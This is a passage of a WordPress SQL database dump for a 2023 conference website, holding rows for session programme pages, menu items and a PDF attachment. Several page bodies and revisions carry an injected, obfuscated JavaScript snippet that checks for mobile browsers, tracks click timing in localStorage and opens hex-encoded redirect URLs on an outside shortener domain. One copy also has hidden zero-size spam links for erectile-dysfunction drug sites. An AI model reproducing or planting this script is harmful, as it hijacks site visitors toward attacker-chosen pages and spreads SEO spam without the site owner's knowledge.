)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-13 12:30:50','2023-08-13 12:30:50','',3066,'https://gsw2023.com/?p=5116',0,'revision','',0),
(5117,1,'2023-09-16 22:41:12','2023-08-13 13:51:34','','Sessions program','','publish','closed','closed','','sessions-program','','','2023-09-16 22:41:12','2023-09-16 22:41:12','',0,'https://gsw2023.com/?p=5117',15,'nav_menu_item','',0),
(5118,1,'2023-09-16 22:41:12','2023-08-13 13:51:34','','Proceedings (coming soon)','','publish','closed','closed','','proceedings','','','2023-09-16 22:41:12','2023-09-16 22:41:12','',0,'https://gsw2023.com/?p=5118',16,'nav_menu_item','',0),
(5119,1,'2023-09-16 22:41:12','2023-08-13 13:54:43','','Instructions for oral presentations','','publish','closed','closed','','instructions-for-oral-presentations','','','2023-09-16 22:41:12','2023-09-16 22:41:12','',0,'https://gsw2023.com/?p=5119',18,'nav_menu_item','',0),
(5120,1,'2023-09-16 22:41:12','2023-08-13 13:54:43','','Instructions for poster presentations','','publish','closed','closed','','instructions-for-poster-presentations','','','2023-09-16 22:41:12','2023-09-16 22:41:12','',0,'https://gsw2023.com/?p=5120',19,'nav_menu_item','',0),
(5122,1,'2023-08-13 14:04:52','2023-08-13 14:04:52','<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx47x4fx78x32x63x332\',\'length\',\'_blank\',\'mobileCheck\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx64x44x6cx33x63x343\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx6bx41x6fx30x63x330\',\'random\',\'-local-storage\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx6fx56x75x37x63x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx61x68x44x36x63x356\',\'12075252qhSFyR\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx5ax50x66x38x63x378\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx51x69x43x35x63x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx43x57x74x31x63x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx57x73x55x34x63x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx53x4ex4bx39x63x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.leivtra.com/\">樂威壯</a>\n</span>]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialisbro.cc/\">犀利士</a>\n</span>_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialisbro.cc/\">犀利士</a>\n</span>5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Session Program','','publish','closed','closed','','session-programme','','','2023-10-03 13:29:59','2023-10-03 13:29:59','',0,'https://gsw2023.com/?p=5122',0,'post','',0),
(5125,1,'2023-08-13 14:03:57','2023-08-13 14:03:57','','GSW2023-Program-2023-08-13.doc','','inherit','open','closed','','gsw2023-program-2023-08-13-doc','','','2023-08-13 14:03:57','2023-08-13 14:03:57','',5122,'https://gsw2023.com/wp-content/uploads/2023/08/GSW2023-Program-2023-08-13.doc.pdf',0,'attachment','application/pdf',0),
(5126,1,'2023-08-13 14:04:52','2023-08-13 14:04:52','<p style=\"text-align: center;\">[pdf-embedder url=\"https://gsw2023.com/wp-content/uploads/2023/08/GSW2023-Program-2023-08-13.doc.pdf\"]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Session Programme','','inherit','closed','closed','','5122-revision-v1','','','2023-08-13 14:04:52','2023-08-13 14:04:52','',5122,'https://gsw2023.com/?p=5126',0,'revision','',0);
INSERT INTO `dnctiavkr_posts` VALUES
